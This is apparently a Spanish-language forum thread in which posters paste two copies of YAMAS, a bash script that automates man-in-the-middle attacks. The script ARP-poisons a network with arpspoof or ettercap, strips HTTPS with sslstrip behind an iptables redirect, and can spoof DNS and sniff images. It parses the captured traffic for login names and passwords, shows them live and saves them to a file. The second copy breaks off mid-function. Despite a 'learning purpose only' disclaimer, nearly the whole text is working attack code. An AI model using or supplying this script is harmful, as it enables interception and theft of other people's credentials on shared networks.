This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;

   -c | --change)
   clear
   echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
   exit ;;

   -s | --silent)
   echo "silent mode ON"
   silent="1"
   shift ;;

   -f | --fav)
   echo "favicon mode ON"
   fav="-f"
   shift ;;

   *) shift ;;
esac

done

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
   message="\nNo message to display : you are running in silent mode"
else
   message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi

if [[ $1 = "-s" || $2 = "-s" ]]; then
   echo "ASCII tables won't be available."
   echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
   wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi

### Check for updates !
if [[ "$silent" = "1" ]];then
   echo "Not checking for a new version : silent mode."
else
   changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
   last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
   if [[ $last_version > $version ]];then # Comparing to current version
      echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
      read update
      if [[ $update = Y || $update = y ]];then
         echo "
  • Updating script..."

         wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
         chmod +x $0
         echo "[-] Script updated !"
         if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
            echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
            read install
            if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
               cp $0 /usr/bin/yamas
               chmod +x /usr/bin/yamas
               echo "Script should now be installed, launching yamas !"
               sleep 3
               yamas
               exit 1
            else
               echo "Ok, continuing with updated version..."
               sleep 3
               $0
               exit 1
            fi
         fi
      
      sleep 2
      $0
      exit 1
      else
         echo "Ok, continuing with current version..."
      fi
   else
      echo "No update available"
   fi
fi
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
   echo "Script is not installed. Do you want to install it ? (Y/N)"
   read install
   if [[ $install = Y || $install = y ]] ; then
      cp -v $0 /usr/bin/yamas
      chmod +x /usr/bin/yamas
      rm $0
      echo "Script should now be installed. Launching it !"
      sleep 3
      yamas
      exit 1
   else
      echo "Ok, not installing then !"
   fi
else
   echo "Script is installed"
   sleep 1
fi
### End of install process

clear
echo -e "
                                                               
     \`YMM'   \`MM'   db      \`7MMM.     ,MMF'      db       .M\"\"\"bgd
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    \"Y
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    \`MMb.     
         VMMP    ,M  \`MM      M  Mb  M' MM     ,M  \`MM      \`YMMNq.
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     \`MM
          MM    A'     VML    M  \`YM'   MM    A'     VML  Mb     dM
        .JMML..AMA.   .AMMA..JML. \`'  .JMML..AMA.   .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version \033[32m$version\033[m                            =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m
  • Cleaning iptables \033[m"

echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m
  • Killing processes and resetting iptable.\033[m"

kill $sslstripid
kill $looparseid

if [[ $drifton = 1 ]]; #if driftnet was used
      then
     echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
         if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
        then
        mkdir $log_output_dir #create if needed
         fi
     killall driftnet #kill the unbeliever
     elif [[ $drifton = 2 ]]; #if tcpxtract was used
     then
     killall tcpxtract  #kill it...
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
   cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
   if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
      echo "Log file copied !" #it does
      else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
   fi
else
   echo "Logs not saved"
fi

echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
   cat /tmp/$filename.txt |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
   if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
      echo "Passwords saved !" #it does
   else
      echo "Error while saving passwords" #it does not
   fi
else
   echo "Password saving skipped."
fi

rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
   echo -e "\n\n"
   exit 1 #if yes, exit.
else
   echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
   read -e install
      case $install in
      Y | y | yes)
         cp $0 /usr/bin/yamas #copy and rename script
         echo -e "\033[32m Script installed !\033[m" ;;
      *) echo "Script not installed." ;;
      esac
fi

exit 1
}

search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.

rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}

add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}

ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}

dns_spoof()
{

### Make Host function###
   mkhst()
   {
   echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
   rm ~/hosts_spoof
   while :
   do
      read input
      echo "$input" >> ~/hosts_spoof
      if [[ $input == "#" ]];then
         break
      fi
   done
   }

###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
   echo "Host file $gothost will be used."
else
   echo -e "We'll make one...\n"
   mkhst
fi

xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}

choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
   E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
   ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
   
   D) echo "We'll use dnsspoof."
   dns_spoof ;;

   a | A) final ;;

   *) echo "Wrong choice. Please use E or D"
   choose_dns;;
esac

final
}

misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
   1) image_menu
      final ;;
   2) choose_dns ;;
   3) final ;;
   *) echo "bad choice"
     misc ;;
esac
}

image_menu()
{
echo -e "Would you rather use driftnet (display images) or tcpxtract ?
1. Tcpxtract (saves all images to $log_output_dir/capture[date])
2. Driftnet (Display images on screen and save all images to $log_output_dir/capture[date])"
read image_choice
case $image_choice in
   1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
      drifton=2
      echo "tcpxtract is launched with pid $tcpid"
      misc ;;
   2)       driftnet -i $iface -d $log_output_dir &> /dev/null &
      drifton=1
      echo "Driftnet launched."
      misc ;;
esac
}

rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out?  It's singular options without a space, so I think the need for quotes is NOT needed??
   1) echo -e "\033[33m
  • Pausing...\033[m"

   kill -19 $looparseid
   echo -e "\033[33m[-]Paused.\033[m"
   rtparse;;

   2) echo -e "\033[33m
  • Resuming...\033[m"

   kill -18 $looparseid
   echo -e "\033[33m[-]Resumed.\033[m"
   rtparse;;

   3) echo -e "\033[31m
  • Killing...\033[m"

   kill $looparseid
   echo -e "\033[33m[-]Killed.\033[m"
   rtparse;;

   4) echo -e "\033[32m
  • Launching...\033[m"

   xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
   sleep 2
   echo -e "\033[33m[-]Launched.\033[m"
   rtparse;;

   5) echo "Previous"
   final ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
   rtparse;;
esac
}

final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Enter the number of the desired option."
read final
case $final in
   1) rescan ;;

   2) add_target ;;

   3) ascii ;;

   4) rtparse ;;

   5) misc ;;

   6) cleanup ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
   final ;;
esac
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m
  • Activating IP forwarding... \033[m"

echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m
  • Configuring iptables... \033[m"

echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi

echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi

echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m
  • Activating sslstrip... \033[m"

echo  "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
   filename="yamas"
fi

echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"

if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
   if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
      chmod +x $sslstrip_dir/sslstrip.py #make it executable
   fi
   $sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
   sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi

sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#Arpspoofing
echo
echo -e "\033[31m
  • Activating ARP cache poisoning... \033[m"

echo
ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
   gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi

echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
   iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
   echo -e "$iface selected as default.\n"
fi

echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
   echo -e "\nDo you want to map the network to show live hosts? (Y/N)   [This might take up to 30 secs, be patient]"
   read -e hosts
   echo -e "\033[31m "
   if [[ $hosts = "Y" || $hosts = "y" ]];then
      nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
      echo -e "\033[m " # switch color back to white
   else
      echo -e "\033[m "
   fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   arpspoofi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
   }

   ettercapi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp  /$gateway/ /$1/ 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
   }

   read -e parameters
   if [[ "$etter" = "1" ]];then
      ettercapi $parameters
   else
      arpspoofi $parameters
   fi

else
   if [[ "$etter" = "1" ]];then
      xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
   else
      xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
   fi
fi

echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
   clear
   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
   cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2383
  • Prácticas precisas precisan práctica
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #48 en: 28-07-2012, 05:11 (Sábado) »
A ver yo lo tengo así:

[spoiler]
# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX

if [ $UID -ne 0 ]; then
    echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
    sleep 3
    fi

log_output_dir=~
sslstrip_dir=
ask_for_install=n

if [ ! -d "$log_output_dir" ]; then
    mkdir -p $log_output_dir
fi

version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
   kill $looparseid
fi

if [[ $sslstripid != "" ]];then
   kill $sslstripid
fi

if [[ $dnsid != "" ]];then
   kill $dnsid
fi

if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
   rm /tmp/looparse.sh
fi

echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}

#Let's define some arguments that can be passed to the script :

#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
   -p | --parse)
      if [[ $2 == "" ]]; then
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
clear
   echo -e "Parsing $2 for credentials.\n\n"
   cat $2 |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq
   exit 0 ;;
   
   -e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
   etter="1"
   shift
   sleep 0.5 ;;

   -h | --help) clear
   echo -e "You are running $0, version $version.


usage : $0 -h -c -p -e -s -f
   -h or --help  :   Display this help message, disclaimer and exit.
   -c or --change: Display changelog and todo.   
   -e :   Use ettercap instead of ARPspoof. One might have one's reasons...
         ARPspoof is default.
   -p or --parse :   Only parse the given <file>. Don't use wildcards.
         Use > /output_file to print to a file.
   -s : The script won't download anything. Make sure you have the needed files.
   -f : Use a padlock favicon in sslstrip.
   
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;

   -c | --change)
   clear
   echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
   exit ;;

   -s | --silent)
   echo "silent mode ON"
   silent="1"
   shift ;;

   -f | --fav)
   echo "favicon mode ON"
   fav="-f"
   shift ;;

   *) shift ;;
esac

done

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
   message="\nNo message to display : you are running in silent mode"
else
   message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi

if [[ $1 = "-s" || $2 = "-s" ]]; then
   echo "ASCII tables won't be available."
   echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
   wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi

### Check for updates !
if [[ "$silent" = "1" ]];then
   echo "Not checking for a new version : silent mode."
else
   changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
   last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
   if [[ $last_version > $version ]];then # Comparing to current version
      echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
      read update
      if [[ $update = Y || $update = y ]];then
         echo "
  • Updating script..."

         wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
         chmod +x $0
         echo "[-] Script updated !"
         if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
            echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
            read install
            if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
               cp $0 /usr/bin/yamas
               chmod +x /usr/bin/yamas
               echo "Script should now be installed, launching yamas !"
               sleep 3
               yamas
               exit 1
            else
               echo "Ok, continuing with updated version..."
               sleep 3
               $0
               exit 1
            fi
         fi
      
      sleep 2
      $0
      exit 1
      else
         echo "Ok, continuing with current version..."
      fi
   else
      echo "No update available"
   fi
fi
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
   echo "Script is not installed. Do you want to install it ? (Y/N)"
   read install
   if [[ $install = Y || $install = y ]] ; then
      cp -v $0 /usr/bin/yamas
      chmod +x /usr/bin/yamas
      rm $0
      echo "Script should now be installed. Launching it !"
      sleep 3
      yamas
      exit 1
   else
      echo "Ok, not installing then !"
   fi
else
   echo "Script is installed"
   sleep 1
fi
### End of install process

clear
echo -e "
                                                              
     \`YMM'   \`MM'   db      \`7MMM.     ,MMF'      db       .M\"\"\"bgd
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    \"Y
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    \`MMb.    
         VMMP    ,M  \`MM      M  Mb  M' MM     ,M  \`MM      \`YMMNq.
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     \`MM
          MM    A'     VML    M  \`YM'   MM    A'     VML  Mb     dM
        .JMML..AMA.   .AMMA..JML. \`'  .JMML..AMA.   .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version \033[32m$version\033[m                            =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m
  • Cleaning iptables \033[m"

echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m
  • Killing processes and resetting iptable.\033[m"

kill $sslstripid
kill $looparseid

if [[ $drifton = 1 ]]; #if driftnet was used
      then
     killall driftnet && killall driftnet #kill the unbeliever
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
   cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
   if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
      echo "Log file copied !" #it does
      else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
   fi
else
   echo "Logs not saved"
fi

echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
   cat /tmp/$filename.txt |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
   if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
      echo "Passwords saved !" #it does
   else
      echo "Error while saving passwords" #it does not
   fi
else
   echo "Password saving skipped."
fi

rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
   echo -e "\n\n"
   exit 1 #if yes, exit.
else
   echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
   read -e install
      case $install in
      Y | y | yes)
         cp $0 /usr/bin/yamas #copy and rename script
         echo -e "\033[32m Script installed !\033[m" ;;
      *) echo "Script not installed." ;;
      esac
fi

exit 1
}

search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.

rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}

add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}

ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}

dns_spoof()
{

### Make Host function###
   mkhst()
   {
   echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
   rm ~/hosts_spoof
   while :
   do
      read input
      echo "$input" >> ~/hosts_spoof
      if [[ $input == "#" ]];then
         break
      fi
   done
   }

###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
   echo "Host file $gothost will be used."
else
   echo -e "We'll make one...\n"
   mkhst
fi

xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}

choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
   E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
   ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
   
   D) echo "We'll use dnsspoof."
   dns_spoof ;;

   a | A) final ;;

   *) echo "Wrong choice. Please use E or D"
   choose_dns;;
esac

final
}

misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
